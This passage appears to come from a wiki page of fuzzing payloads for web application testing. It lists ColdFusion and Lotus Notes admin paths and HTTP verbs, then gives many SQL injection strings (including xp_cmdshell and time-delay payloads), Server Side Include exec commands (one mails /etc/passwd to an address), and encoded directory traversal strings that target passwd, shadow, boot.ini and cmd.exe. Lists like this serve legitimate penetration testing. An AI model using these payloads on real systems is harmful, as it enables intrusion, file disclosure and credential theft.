CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
